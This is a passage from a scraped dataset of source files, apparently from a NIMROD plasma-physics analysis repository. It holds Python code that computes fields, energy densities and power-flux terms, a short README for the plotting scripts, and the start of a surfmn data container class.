'''\n self.mu0=self.const_nml.get('mu0_input',np.pi*4.0e-7)\n self.me=self.const_nml.get('me_input',9.1093898e-31)\n self.mi=self.const_nml.get('mi_input',3.3435860e-27)\n self.zeff=self.const_nml.get('zeff_input',1.0)\n self.mtot=self.me + self.mi/self.zeff\n self.qe=self.const_nml.get('chrg_input',1.60217733e-19)\n self.gamma=self.const_nml.get('gam_input',5./3.)\n self.kblz=self.const_nml.get('kblz_input',1.60217733e-19)\n self.clight=self.const_nml.get('c_input',2.99792458e8)\n return None\n\n def set_evalnimrod(self):\n '''\n Set Eval Nimrod\n '''\n if self.eval is None:\n self.eval=eval.EvalNimrod(self.dumpfile,fieldlist='nvbtjpd')\n return None\n\n def get_gridrzp(self,grid):\n '''\n returns grid and rzp, and grid for a given grid\n if grid=None, try self.grid\n elif grid is an EvalGrid insatnace\n else np grid\n '''\n if grid is None:\n if self.grid is None:\n print(\"ntm_fields_grid is not set\")\n raise ValueError\n else:\n grid=self.grid\n rzp=self.grid.rzp\n elif isinstance(grid,eval.EvalGrid):\n rzp=grid.rzp\n else:\n rzp=grid\n return grid,rzp\n\n @timer.timer_func\n def fft(self,pert,axis=-1,type=None):\n ''' NIMROD stores it's field data as f(phi) = sum_{-n}^n f_n exp(inphi)\n This implies that the normalization 1/N should be done in the transform\n from physical space to fourier space\n This is the one option that scipi.fft does not support, but why?\n '''\n #fpert = fft(pert.data,axis=axis,norm=None)/pert.data.shape[axis]\n #try rfft to save space (computation)\n fpert = rfft(pert.data,axis=axis,norm=None)/pert.data.shape[axis]\n if type=='s':\n fpert = fpert[0,...]\n elif type=='v':\n fpert = fpert[0:3,...]\n return fpert\n\n def set_method(self,method):\n if method == \"induction\":\n self.ndmode=1\n self.neq=True\n self.npert=False\n self.vdmode=1\n self.veq=True\n self.vpert=True\n self.beq=True\n self.bpert=True\n self.jeq=True\n self.jpert=True\n self.peq=True\n self.p0=True\n self.ppert=True\n self.diff_dmode=1\n elif method == 'powerflux':\n self.ndmode=1 #check\n self.neq=True\n self.ne0=True\n self.npert=False\n self.vdmode=2\n self.veq=True\n self.ve0=True\n self.vpert=True\n self.bdmode=1\n self.beq=True\n self.be0=True\n self.bpert=True\n self.jdmode=1\n self.jeq=True\n self.je0=True\n self.jpert=True\n self.pdmode=1\n self.peq=True\n self.p0=True\n self.ppert=True\n self.diff_dmode=1\n elif method == 'advectPowerflux':\n self.ndmode=0 #check\n self.neq=True\n self.ne0=True\n self.npert=False\n self.vdmode=1\n self.veq=True\n self.ve0=True\n self.vpert=True\n\n @timer.timer_func\n def eval_symm(self,fname,rzp,dmode,eq):\n if eq not in [1,3]:\n print(\"eval_symm only works for eq=1 or 3\")\n raise ValueError\n newrzp=rzp[:,0]\n field=self.eval.eval_field(fname,newrzp,dmode=dmode,eq=eq)\n field=field.reshape(*field.shape,1)\n field=np.broadcast_to(field,(field.shape[0],rzp.shape[1]))\n return field\n\n @timer.timer_func\n def eval_n(self,grid=None,fft=False):\n grid,rzp=self.get_gridrzp(grid)\n if self.neq or self.ne0:\n if len(rzp.shape)==2:\n field=self.eval_symm('n',rzp,dmode=self.ndmode,eq=1)\n self.fielddict['neq']=fc.Scalar(field,rzp,self.ndmode,True)\n else:\n field=self.eval.eval_field('n', grid, dmode=self.ndmode, eq=1)\n self.fielddict['neq']=fc.Scalar(field,rzp,self.ndmode,True)\n if self.ne0:\n if len(rzp.shape)==2:\n field2=self.eval_symm('n',rzp,dmode=self.ndmode,eq=3)\n field2=field2-field #sutract eq\n self.fielddict['ne0']=fc.Scalar(field2,rzp,self.ndmode,True)\n else:\n field2=self.eval.eval_field('n', grid, dmode=self.ndmode, eq=3)\n field2=field2-field #subtract eq\n self.fielddict['ne0']=fc.Scalar(field2,rzp,self.ndmode,True)\n if self.npert:\n field=self.eval.eval_field('n', grid, dmode=self.ndmode, eq=0)\n if self.ne0:\n field=field-field2 #remove n=0 perturbation\n self.fielddict['npert']=fc.Scalar(field,rzp,self.ndmode,True)\n if fft:\n self.fielddict['nfour']=self.fft(field,type='s')\n return None\n\n\n @timer.timer_func\n def eval_v(self,grid=None,fft=False):\n grid,rzp=self.get_gridrzp(grid)\n if self.veq or self.ve0:\n if len(rzp.shape)==2:\n field=self.eval_symm('v',rzp,dmode=self.vdmode,eq=1)\n self.fielddict['veq']=fc.Vector(field,rzp,self.vdmode,True)\n else:\n field=self.eval.eval_field('v', grid, dmode=self.vdmode,eq=1)\n self.fielddict['veq']=fc.Vector(field,rzp,self.vdmode,True)\n if self.ve0:\n if len(rzp.shape)==2:\n field2=self.eval_symm('v',rzp,dmode=self.vdmode,eq=3)\n field2=field2-field #sutract eq\n self.fielddict['ve0']=fc.Vector(field2,rzp,self.vdmode,True)\n else:\n field2=self.eval.eval_field('v', grid, dmode=self.vdmode, eq=3)\n field2=field2-field #subtract eq\n self.fielddict['ve0']=fc.Vector(field2,rzp,self.vdmode,True)\n if self.vpert:\n field=self.eval.eval_field('v', grid, dmode=self.vdmode, eq=0)\n if self.ve0:\n field=field-field2 #subtract n=0 perturbation\n self.fielddict['vpert']=fc.Vector(field,rzp,self.vdmode,True)\n if fft:\n self.fielddict['vfour']=self.fft(field,type='v')\n return None\n\n @timer.timer_func\n def eval_b(self,grid=None,fft=False):\n grid,rzp=self.get_gridrzp(grid)\n if self.beq or self.be0:\n if len(rzp.shape)==2:\n field=self.eval_symm('b',rzp,dmode=self.bdmode,eq=1)\n self.fielddict['beq']=fc.Vector(field,rzp,self.bdmode,True)\n else:\n field=self.eval.eval_field('b',grid,dmode=self.bdmode,eq=1)\n self.fielddict['beq']=fc.Vector(field,rzp,self.bdmode,True)\n if self.be0:\n if len(rzp.shape)==2:\n field2=self.eval_symm('b',rzp,dmode=self.bdmode,eq=3)\n field2=field2-field #sutract eq\n self.fielddict['be0']=fc.Vector(field2,rzp,self.bdmode,True)\n else:\n field2=self.eval.eval_field('b', grid, dmode=self.bdmode, eq=3)\n field2=field2-field #subtract eq\n self.fielddict['be0']=fc.Vector(field2,rzp,self.bdmode,True)\n if self.bpert:\n field=self.eval.eval_field('b',grid,dmode=self.bdmode, eq=0)\n if self.be0:\n field=field-field2 #subtract n=0 perturbation\n self.fielddict['bpert']=fc.Vector(field,rzp,self.bdmode,True)\n if fft:\n self.fielddict['bfour']=self.fft(field,type='v')\n return None\n\n @timer.timer_func\n def eval_fsa_beq2(self,grid=None):\n grid,rzp=self.get_gridrzp(grid)\n self.dump_fsa_beq2 =self.output_nml.get('dump_fsa_beq2',False)\n if self.dump_fsa_beq2:\n if len(rzp.shape)==2:\n field=self.eval_symm('fsa_beq2', grid, dmode=1, eq=1)\n self.fielddict['fsa_beq2']=fc.Scalar(field,rzp,1,True)\n else:\n field=self.eval.eval_field('fsa_beq2', grid, dmode=1, eq=1)\n self.fielddict['fsa_beq2']=fc.Scalar(field,rzp,1,True)\n else:\n self.fielddict['fsa_beq2']=0.0\n return None\n\n @timer.timer_func\n def eval_j(self,grid=None,fft=False):\n grid,rzp=self.get_gridrzp(grid)\n if self.jeq or self.je0:\n if len(rzp.shape)==2:\n field=self.eval_symm('j',rzp,dmode=self.jdmode,eq=1)\n self.fielddict['jeq']=fc.Vector(field,rzp,self.jdmode,True)\n else:\n field=self.eval.eval_field('j', grid, dmode=self.jdmode, eq=1)\n self.fielddict['jeq']=fc.Vector(field,rzp,self.jdmode,True)\n if self.je0:\n if len(rzp.shape)==2:\n field2=self.eval_symm('j',rzp,dmode=self.jdmode,eq=3)\n field2=field2-field #sutract eq\n self.fielddict['je0']=fc.Vector(field2,rzp,self.jdmode,True)\n else:\n field2=self.eval.eval_field('j', grid, dmode=self.jdmode, eq=3)\n field2=field2-field #subtract eq\n self.fielddict['je0']=fc.Vector(field2,rzp,self.jdmode,True)\n if self.jpert:\n field=self.eval.eval_field('j', grid, dmode=self.jdmode, eq=0)\n if self.je0:\n field=field-field2\n self.fielddict['jpert']=fc.Vector(field,rzp,self.jdmode,True)\n if fft:\n self.fielddict['jfour']=self.fft(field,type='v')\n return None\n\n @timer.timer_func\n def eval_neo_mask(self,grid=None):\n grid,rzp=self.get_gridrzp(grid)\n r0=self.closure_nml.get('neo_axis_r',0)\n z0=self.closure_nml.get('neo_axis_z',0)\n rbump=self.closure_nml.get('neo_bump_r0',1.0)\n shape=list(rzp.shape)\n shape[0]=4\n fval=np.zeros(shape)\n fval[0]=1.0\n r2=(np.power(rzp[0]-r0,2)+np.power(rzp[1]-z0,2))/rbump**2\n if isinstance(r2,np.float):\n if r2<1.0:\n #check\n bump=np.exp(1-1./(1.-r2))\n dbumpdr2=-r2/(1-r2)**3\n dr2dx=2*(rzp[0]-r0)/rbump**2\n dr2dz=2*(rzp[1]-r0)/rbump**2\n d2r2dxx=2/rbump**2\n d2r2dyy=2/rbump**2\n d2r2dxy=0.0\n #print(type(bump),type(dbumpdr2),type(dr2dx))\n #print(dbumpdr2.shape)\n fval[0]=1.0-bump\n fval[1]=-bump*dbumpdr2*dr2dx\n fval[2]=-bump*dbumpdr2*dr2dz\n else:\n result=np.where(r2<1.0)\n for indicies in zip(*result):\n #check\n bump=np.exp(1-1./(1.-r2[indicies]))\n dbumpdr2=-r2[indicies]/(1-r2[indicies])**3\n dr2dx=2*(rzp[(0,)+indicies]-r0)/rbump**2\n dr2dz=2*(rzp[(1,)+indicies]-r0)/rbump**2\n d2r2dxx=2/rbump**2\n d2r2dyy=2/rbump**2\n d2r2dxy=0.0\n #print(type(bump),type(dbumpdr2),type(dr2dx))\n #print(dbumpdr2.shape)\n fval[(0,)+indicies]=1.0-bump\n fval[(1,)+indicies]=-bump*dbumpdr2*dr2dx\n fval[(2,)+indicies]=-bump*dbumpdr2*dr2dz\n return fc.Scalar(fval,rzp,1,True)\n\n @timer.timer_func\n def eval_p(self,grid=None,fft=False):\n grid,rzp=self.get_gridrzp(grid)\n if self.peq or self.p0:\n if len(rzp.shape)==2:\n field=self.eval_symm('p',rzp,dmode=self.pdmode,eq=1)\n self.fielddict['peq']=fc.Scalar(field,rzp,self.pdmode,True)\n else:\n field=self.eval.eval_field('p',grid,dmode=self.pdmode,eq=1)\n self.fielddict['peq']=fc.Scalar(field,rzp,self.pdmode,True)\n if self.p0:\n if len(rzp.shape)==2:\n field2=self.eval_symm('p',rzp,dmode=self.pdmode,eq=3)\n field2=field2-field #sutract eq\n self.fielddict['p0']=fc.Scalar(field2,rzp,self.pdmode,True)\n else:\n field2=self.eval.eval_field('p', grid, dmode=self.pdmode, eq=3)\n field2=field2-field #subtract eq\n self.fielddict['p0']=fc.Scalar(field2,rzp,self.pdmode,True)\n if self.ppert:\n field=self.eval.eval_field('p',grid,dmode=self.pdmode,eq=0)\n if self.p0:\n field=field-field2 #remove n=0 perturbation\n self.fielddict['ppert']=fc.Scalar(field,rzp,self.pdmode,True)\n if fft:\n self.fielddict['pfour']=self.fft(field,type='s')\n return None\n\n\n @timer.timer_func\n def eval_diff(self,grid=None):\n ''' Get the diff shape scalars from eval nimrod\n Some extralogic is needed to pull apart the different\n diff shape scalar fields from the output of eval_field\n note when ds_nqty>1\n elecd_diff is 0\n iso_visc_diff is 1\n '''\n diff_dmode=self.diff_dmode\n grid,rzp=self.get_gridrzp(grid)\n self.ds_nqty = self.equil_nml.get('ds_nqty',1)\n if len(rzp.shape)==2:\n field=self.eval_symm('d',rzp,dmode=diff_dmode,eq=1)\n else:\n field=self.eval.eval_field('d',grid,dmode=diff_dmode, eq=1)\n diff_shape=[]\n ishape=list(field.shape)\n ishape[0]=ishape[0]//self.ds_nqty\n ifield= np.zeros(ishape)\n for ii in range(self.ds_nqty):\n ifield[0] = field[ii]\n if diff_dmode>0:\n start=self.ds_nqty+ii*3\n end=start+3\n ifield[1:4]=field[start:end]\n if diff_dmode>1:\n start=self.ds_nqty*4+ii*6\n end=start+6\n ifield[4:10]=field[start:end]\n diff_shape.append(fc.Scalar(ifield,rzp,diff_dmode,True))\n self.fielddict['diff_shape']=diff_shape\n return None\n\n @timer.timer_func\n def calculateFilter(self,grid=None,cutoff=300):\n grid,rzp=self.get_gridrzp(grid)\n if 'diff_shape' not in self.fielddict:\n self.eval_diff(grid)\n if 'jeq' not in self.fielddict:\n self.eval_j(grid,fft=True)\n nfour=self.fielddict['jfour'].shape[-1]\n temp = np.nan_to_num(self.fielddict['diff_shape'][0].data[...,:nfour])\n self.filter = np.where((temp < cutoff) & (temp > 0), 1., 0.)\n\n @timer.timer_func\n def energyDensity(self,grid=None):\n grid,rzp=self.get_gridrzp(grid)\n if 'veq' not in self.fielddict:\n self.eval_v(grid,fft=True)\n if 'beq' not in self.fielddict:\n self.eval_b(grid,fft=True)\n if 'neq' not in self.fielddict:\n self.eval_n(grid,fft=False)\n\n bTempP=self.fielddict['bfour']\n fac=1./(self.mu0)\n bpert=fac*np.sum(bTempP[0:3]*np.conjugate(bTempP[0:3]),axis=0,where=~np.isnan(bTempP[0:3]))\n bpert[...,0]=bpert[...,0]/2.0\n self.energyDict['bpert']=bpert\n fac=fac/2\n bTempE=self.fielddict['beq'].data[...,0]\n beq=fac*np.sum(bTempE[0:3]*np.conjugate(bTempE[0:3]),axis=0,where=~np.isnan(bTempE[0:3]))\n self.energyDict['beq']=beq\n bTempZ=bTempE+self.fielddict['be0'].data[...,0]\n be0=fac*np.sum(bTempZ[0:3]*np.conjugate(bTempZ[0:3]),axis=0,where=~np.isnan(bTempZ[0:3]))\n self.energyDict['be0']=be0\n\n vTempP=self.fielddict['vfour']\n nfour=vTempP.shape[-1]\n vTempE=self.fielddict['veq'].data[...,:nfour]\n vTempZ=vTempE[0:3,...,0]+self.fielddict['vfour'][0:3,...,0]\n nTempE=self.fielddict['neq'].data[...,:nfour]\n\n fac=self.mi\n vpert=fac*np.sum(vTempP[0:3]*np.conjugate(vTempP[0:3]),axis=0,where=~np.isnan(bTempP[0:3]))\n vpert=np.multiply(nTempE,vpert,out=vpert,where=~np.isnan(nTempE))\n vpert[...,0]=vpert[...,0]/2.0\n self.energyDict['vpert']=vpert\n\n veq=fac*np.sum(vTempE[0:3,...,0]*np.conjugate(vTempE[0:3,...,0]),axis=0,where=~np.isnan(vTempE[0:3,...,0]))\n veq=np.multiply(nTempE[...,0],veq,out=veq,where=~np.isnan(nTempE[...,0]))\n veq=veq/2.0\n self.energyDict['veq']=veq\n\n return\n\n @timer.timer_func\n def calculate_viscositiy(self,grid=None):\n ''' Calculate the divergence of the ion viscous stress tensor '''\n grid,rzp=self.get_gridrzp(grid)\n if 'veq' not in self.fielddict:\n self.eval_v(grid,fft=True)\n iso_visc = self.physics_nml.get('iso_visc',0.0)\n if isinstance(iso_visc,(np.ndarray,list)):\n iso_visc=iso_visc[0]\n ndens = self.equil_nml.get('ndens',1.e20)\n mtot = self.mtot\n if iso_visc > 0:\n visc_fac = -1.0 * mtot * ndens * iso_visc * \\\n self.fielddict['diff_shape'][1]\n pi_tensor = self.fielddict['vpert'].grad() + \\\n self.fielddict['vpert'].grad().transpose() - \\\n 2./3. * fc.eye(rzp) * self.fielddict['vpert'].div()\n pi_tensor *= visc_fac\n return pi_tensor.div()\n else:\n return None\n\n @timer.timer_func\n def calculate_neo_div_pi(self,grid=None):\n 'calculates div Pi_i and 1/ne div Pi_e'\n grid,rzp=self.get_gridrzp(grid)\n if 'fsa_beq2' not in self.fielddict:\n self.eval_fsa_beq2(grid)\n mu_i=self.closure_nml.get('mu_i',0.0)\n mu_e=self.closure_nml.get('mu_e',0.0)\n beq=self.fielddict['beq']\n neq=self.fielddict['neq']\n fsa_beq2=self.fielddict['fsa_beq2']\n jpert=self.fielddict['jpert']\n vpert=self.fielddict['vpert']\n ephi=[0,0,1]\n etor=fc.basis_vector('p',rzp,torgeom=True)\n bep=beq-beq.dot(etor)*etor\n\n neo_mask=self.eval_neo_mask(grid)\n work_vec = neo_mask * fsa_beq2 /(beq.dot(bep)**2+1.0e-8) * bep\n\n #ecoef=self.mi*mu_i*neo_mask\n ifac = self.mi * mu_i\n efac =-self.me * mu_e / (self.qe**2)\n div_pi_i = ifac * neq * vpert.dot(bep) * work_vec\n div_pi_e = efac / neq * jpert.dot(bep) * work_vec\n self.fielddict['ndivPiipert'] = div_pi_i\n self.fielddict['ndivPiepert'] = div_pi_e\n\n\n @timer.timer_func\n def calculate_E(self,grid=None):\n ''' Calculate the electric field and the Curl of E for the Poynting Flux\n '''\n grid,rzp=self.get_gridrzp(grid)\n\n v_vec = self.fielddict['veq'] + self.fielddict['ve0'] + \\\n self.fielddict['vpert']\n b_vec = self.fielddict['beq'] + self.fielddict['be0'] + \\\n self.fielddict['bpert']\n\n j_vec = self.fielddict['jpert'] # ONLY N!= IS needed\n\n div_pi_term = self.fielddict['ndivPiepert']\n\n Efield = - v_vec.cross(b_vec) \\\n + self.mu0 * self.elecd * j_vec - div_pi_term\n\n self.fielddict['epert'] = Efield\n\n self.fielddict['edis'] = self.mu0 * self.elecd * j_vec - div_pi_term\n self.fielddict['elin'] = - self.fielddict['veq'].cross(\n self.fielddict['bpert']) - \\\n self.fielddict['vpert'].cross(\n self.fielddict['beq'])\n self.fielddict['eqln'] = - self.fielddict['ve0'].cross(\n self.fielddict['bpert']) - \\\n self.fielddict['vpert'].cross(\n self.fielddict['be0'])\n\n self.fielddict['enon'] = - self.fielddict['vpert'].cross(\n self.fielddict['bpert'])\n\n return None\n\n @timer.timer_func\n def dotPlusCc(self,field1,field2):\n #first check dims\n if field1.shape!=field2.shape:\n print(\"array dimensions dont match\")\n raise ValueError\n fshape=field1.shape[1:]\n result=np.zeros(fshape,dtype=complex)\n for ii in range(fshape[-1]):\n result[...,ii]=np.sum(field1[...,ii]*np.conj(field2[...,ii]) ,axis=0)\n if ii != 0:\n result[...,ii]+=np.conj(result[...,ii])\n return np.nan_to_num(np.real(result))\n\n @timer.timer_func\n def powerFlux(self,grid=None):\n grid,rzp=self.get_gridrzp(grid)\n if 'veq' not in self.fielddict:\n self.eval_v(grid,fft=True)\n if 'beq' not in self.fielddict:\n self.eval_b(grid,fft=True)\n if 'neq' not in self.fielddict:\n self.eval_n(grid,fft=False)\n if 'jeq' not in self.fielddict:\n self.eval_j(grid,fft=True)\n if 'peq' not in self.fielddict:\n self.eval_p(grid,fft=False)\n if 'diff_shape' not in self.fielddict:\n self.eval_diff(grid)\n\n ohmslaw=self.physics_nml.get('ohms','mhd')\n neoe_flag = self.closure_nml.get('neoe_flag',None)\n mu_e=self.closure_nml.get('mu_e',0.0)\n try:\n self.elecd=self.physics_nml.get('elecd',0.0)\n if isinstance(self.elecd,(np.ndarray,list)):\n self.elecd=self.elecd[0]\n except:\n print(\"Can't read elecd from nimrod.in\")\n raise KeyError\n self.calculate_neo_div_pi(grid=grid)\n self.calculate_E(grid=grid)\n\n jeq_cross_bpert = self.fielddict['jeq'].cross(self.fielddict['bpert'],dmod=0)\n jpert_cross_beq = self.fielddict['jpert'].cross(self.fielddict['beq'],dmod=0)\n j0_cross_bpert = self.fielddict['je0'].cross(self.fielddict['bpert'],dmod=0)\n jpert_cross_b0 = self.fielddict['jpert'].cross(self.fielddict['be0'],dmod=0)\n jpert_cross_bpert =self.fielddict['jpert'].cross(self.fielddict['bpert'],dmod=0)\n\n j_cross_b_eq = self.fft(jeq_cross_bpert+jpert_cross_beq)\n j_cross_b_n0 = self.fft(j0_cross_bpert+jpert_cross_b0)\n j_cross_b_pert = self.fft(jpert_cross_bpert)\n\n veq_cross_bpert = self.fielddict['veq'].cross(self.fielddict['bpert'],dmod=0)\n vpert_cross_beq = self.fielddict['vpert'].cross(self.fielddict['beq'],dmod=0)\n v0_cross_bpert = self.fielddict['ve0'].cross(self.fielddict['bpert'],dmod=0)\n vpert_cross_b0 = self.fielddict['vpert'].cross(self.fielddict['be0'],dmod=0)\n vpert_cross_bpert = self.fielddict['vpert'].cross(self.fielddict['bpert'],dmod=0)\n\n v_cross_b_eq = self.fft(veq_cross_bpert+vpert_cross_beq)\n v_cross_b_n0 = self.fft(v0_cross_bpert+vpert_cross_b0)\n v_cross_b_pert = self.fft(vpert_cross_bpert)\n\n fac=1.0 #fac should be one, keep as 2 for convergence testing\n self.powerFluxDict['vxbeq'] = fac * \\\n self.dotPlusCc(v_cross_b_eq,self.fielddict['jfour'][0:3])\n self.powerFluxDict['vxbn0'] = fac * \\\n self.dotPlusCc(v_cross_b_n0,self.fielddict['jfour'][0:3])\n self.powerFluxDict['vxbp'] = fac * \\\n self.dotPlusCc(v_cross_b_pert,self.fielddict['jfour'][0:3])\n\n fac=-1.0\n nfour=self.fielddict['jfour'].shape[-1]\n diff_elecd = np.nan_to_num(self.fielddict['diff_shape'][0].data[...,:nfour])\n self.powerFluxDict['etajp'] = fac * \\\n self.mu0 * self.elecd * diff_elecd * \\\n self.dotPlusCc(self.fielddict['jfour'][0:3],\n self.fielddict['jfour'][0:3])\n\n fac=1.0\n div_pie_pert = self.fft(self.fielddict['ndivPiepert']) #div Pi_e /ne\n self.powerFluxDict['divPie'] =fac * \\\n self.dotPlusCc(div_pie_pert,self.fielddict['jfour'][0:3])\n\n\n fac=1.0 #fac should be one, keep as 2 for convergence testing\n self.powerFluxDict['jxbeq'] = fac * \\\n self.dotPlusCc(j_cross_b_eq,self.fielddict['vfour'][0:3])\n self.powerFluxDict['jxbn0'] = fac * \\\n self.dotPlusCc(j_cross_b_n0,self.fielddict['vfour'][0:3])\n self.powerFluxDict['jxbp'] = fac * \\\n self.dotPlusCc(j_cross_b_pert,self.fielddict['vfour'][0:3])\n\n gradp_pert = self.fft(self.fielddict['ppert'].grad(dmod=0))\n fac = -1.0 #I think fac should be -1, keep as 2 for convergence testing\n self.powerFluxDict['ngpp'] = fac * \\\n self.dotPlusCc(gradp_pert,self.fielddict['vfour'][0:3])\n\n div_pi = self.calculate_viscositiy(grid=grid)\n fac = - 1.0\n if div_pi is not None:\n div_pi_pert = self.fft(div_pi)\n self.powerFluxDict['divpip'] = fac * \\\n self.dotPlusCc(div_pi_pert,self.fielddict['vfour'][0:3])\n\n fac= -1.0\n div_pii_pert = self.fft(self.fielddict['ndivPiipert'])\n self.powerFluxDict['divPii'] =fac * \\\n self.dotPlusCc(div_pii_pert,self.fielddict['vfour'][0:3])\n\n eFour = self.fft(self.fielddict['epert'],type='v')\n curlEFour = self.fft(self.fielddict['epert'].curl(dmod=0),type='v')\n\n fac1 = -1.0/self.mu0\n fac2 = 1.0\n self.powerFluxDict['poynting'] = fac1 * \\\n self.dotPlusCc(self.fielddict['bfour'][0:3],curlEFour[0:3]) + \\\n fac2 * self.dotPlusCc(eFour[0:3],self.fielddict['jfour'][0:3])\n\n if \"edis\" in self.fielddict:\n eFour = self.fft(self.fielddict['edis'],type='v')\n curlEFour = self.fft(self.fielddict['edis'].curl(dmod=0),type='v')\n self.powerFluxDict['poyndis'] = fac1 * \\\n self.dotPlusCc(self.fielddict['bfour'][0:3],curlEFour[0:3]) + \\\n fac2 * self.dotPlusCc(eFour[0:3],self.fielddict['jfour'][0:3])\n\n if \"elin\" in self.fielddict:\n eFour = self.fft(self.fielddict['elin'],type='v')\n curlEFour = self.fft(self.fielddict['elin'].curl(dmod=0),type='v')\n self.powerFluxDict['poynlin'] = fac1 * \\\n self.dotPlusCc(self.fielddict['bfour'][0:3],curlEFour[0:3]) + \\\n fac2 * self.dotPlusCc(eFour[0:3],self.fielddict['jfour'][0:3])\n\n if \"eqln\" in self.fielddict:\n eFour = self.fft(self.fielddict['eqln'],type='v')\n curlEFour = self.fft(self.fielddict['eqln'].curl(dmod=0),type='v')\n self.powerFluxDict['poynqln'] = fac1 * \\\n self.dotPlusCc(self.fielddict['bfour'][0:3],curlEFour[0:3]) + \\\n fac2 * self.dotPlusCc(eFour[0:3],self.fielddict['jfour'][0:3])\n\n if \"enon\" in self.fielddict:\n eFour = self.fft(self.fielddict['enon'],type='v')\n curlEFour = self.fft(self.fielddict['enon'].curl(dmod=0),type='v')\n self.powerFluxDict['poynnon'] = fac1 * \\\n self.dotPlusCc(self.fielddict['bfour'][0:3],curlEFour[0:3]) + \\\n fac2 * self.dotPlusCc(eFour[0:3],self.fielddict['jfour'][0:3])\n\n @timer.timer_func\n def advectPowerFlux(self,grid=None):\n grid,rzp=self.get_gridrzp(grid)\n if 'veq' not in self.fielddict:\n self.eval_v(grid,fft=True)\n if 'neq' not in self.fielddict:\n self.eval_n(grid,fft=False)\n\n gradveq = self.fielddict['veq'].grad()\n gradve0 = self.fielddict['ve0'].grad()\n gradvp = self.fielddict['vpert'].grad()\n\n veq_dot_gradvp =self.fielddict['veq'].dot(gradvp)\n ve0_dot_gradvp =self.fielddict['ve0'].dot(gradvp)\n vp_dot_gradveq =self.fielddict['vpert'].dot(gradveq)\n vp_dot_gradve0 =self.fielddict['vpert'].dot(gradve0)\n vp_dot_gradvp =self.fielddict['vpert'].dot(gradvp)\n\n\n neq_v_dot_grad_v_eq = self.fft(self.fielddict['neq'] * \\\n (veq_dot_gradvp + vp_dot_gradveq) )\n\n neq_v_dot_grad_v_n0 = self.fft(self.fielddict['neq'] * \\\n (ve0_dot_gradvp + vp_dot_gradve0) )\n neq_v_dot_grad_v_p = self.fft(self.fielddict['neq'] * vp_dot_gradvp )\n\n fac = -1.0 * self.mi\n self.advectDict['rhovdveq'] = fac * \\\n self.dotPlusCc(neq_v_dot_grad_v_eq,self.fielddict['vfour'][0:3])\n\n self.advectDict['rhovdvn0'] = fac * \\\n self.dotPlusCc(neq_v_dot_grad_v_n0 ,self.fielddict['vfour'][0:3])\n\n self.advectDict['rhovdvp'] = fac * \\\n self.dotPlusCc(neq_v_dot_grad_v_p,self.fielddict['vfour'][0:3])\n\n @timer.timer_func\n def clean_up(self):\n for key, field in self.fielddict.items():\n field = None\n self.fielddict={}\n for key, field in self.energyDict.items():\n field = None\n self.energyDict={}\n for key, field in self.powerFluxDict.items():\n field = None\n self.powerFluxDict={}\n for key, field in self.advectDict.items():\n field = None\n self.advectDict={}\n self.filter = None\n self.eval=None\n self.grid=None\n\n @timer.timer_func\n def clean_up_fsa(self):\n for key, field in self.fielddict.items():\n field = None\n self.fielddict={}\n #for key, field in self.energyDict.items():\n # field = None\n #self.energyDict={}\n for key, field in self.powerFluxDict.items():\n field = None\n self.powerFluxDict={}\n for key, field in self.advectDict.items():\n field = None\n self.advectDict={}\n self.grid=None\n" }, { "alpha_fraction": 0.7163265347480774, "alphanum_fraction": 0.718367338180542, "avg_line_length": 36.769229888916016, "blob_id": "7ddfbc4cc28644d3ecf629cc17319e61ff02294a", "content_id": "93c6b744bfbd41cfac70f6b5514180a95d14b704", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 490, "license_type": "no_license", "max_line_length": 85, "num_lines": 13, "path": "/plotingScripts/README.md", "repo_name": "echowell/nimrodscripts", "src_encoding": "UTF-8", "text": "## plotingScripts\nThis directory contains a collection of scripts for plotting NIMROD output in python\n\n### Scripts\n - **eqInputPlts.py:** Plots the fields in eq_input files\n - **freeBdryPlts.py:** Plots the output generated by in free boundary GS solves.\n - **footPointPlot.py:** Plots the magnetic footpoint on the DIII-D lower divertor. \n \n### Todo\n - [ ] Clean up scripts\n - [ ] Improve documentation\n - [ ] Convert to python 3\n - [ ] Continue to add my random assortment of scripts" }, { "alpha_fraction": 0.6155505776405334, "alphanum_fraction": 0.6265168786048889, "avg_line_length": 32.011871337890625, "blob_id": "843ac05d4714b062bbda18dc5901ed5fb325d461", "content_id": "957c5f24e52246d1869b8e0d036d720db8ae607d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 11125, "license_type": "no_license", "max_line_length": 88, "num_lines": 337, "path": "/surfmn/surfmnstep.py", "repo_name": "echowell/nimrodscripts", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\n#\n#surfmnstep is a container class for storing data useful for analyzing surfmn\n#data\n#\n#\nimport h5py\nimport numpy as np\nimport scipy.interpolate as interp\nimport matplotlib.pyplot as plt\nimport matplotlib.colors as mcolors\nimport pickle\nimport profiles as pf\n\nclass SurfmnStep:\n def __init__(self,surfmn_file,dumpfile,stepnumber,steptime,nimrodin):\n self.surfmn_file=surfmn_file\n self.dumpfile=dumpfile\n self.step=stepnumber\n self.time=steptime\n self.nimrodin=nimrodin\n self.profdata=False\n self.profs=None\n self.mmax=None\n self.surfmn_data=False #set to true surfmn file has been read\n self.nlist=[]\n self.ndict={}\n self.bmnlist=[]\n self.psimnlist=[]\n self.rho = np.empty([1]) #this is a fsa r\n self.vprime = np.empty([1])\n self.q = np.empty([1])\n self.mr=np.empty([1])\n self.psi_q = np.empty([1])\n self.qmin=np.empty([1])\n self.qmax=np.empty([1])\n def get_m_index(self,m):\n '''Return the index for the given m\n Return None if m is out of range'''\n if self.mmax==None:\n write(\"mmax has not be set in get_m_index\")\n raise\n else:\n if m>self.mmax:\n return None\n elif m<-1*self.mmax:\n return None\n else:\n return m+self.mmax\n def read_surfmn(self):\n '''Reads a surfmn h5 file\n Stores profiles in np.arrays\n Calculates psimn from bmn\n sets mmax (no consistancy checks across bmn)\n '''\n index=0\n with h5py.File(self.surfmn_file,'r') as fc:\n self.surfmn_data=True\n self.rho = np.array(fc['rho'][:])\n profs = fc['prof'][:]\n self.vprime = -1.0*np.array(profs[0])\n self.q = np.array(profs[1])\n self.mr=np.array(fc['surfmnGrid'][:])\n self.psi_q = interp.interp1d(self.q,self.rho)\n self.qmin=np.amin(self.q)\n self.qmax=np.amax(self.q)\n for key in fc.keys():\n if key.startswith(\"Bmn\"):\n self.nlist.append(int(key[3:]))\n self.ndict[int(key[3:])]=index\n index+=1\n thisbmn=np.array(fc[key][:])\n if not(self.mmax):\n self.mmax=int((thisbmn.shape[1]-1)/2)\n self.bmnlist.append(thisbmn)\n 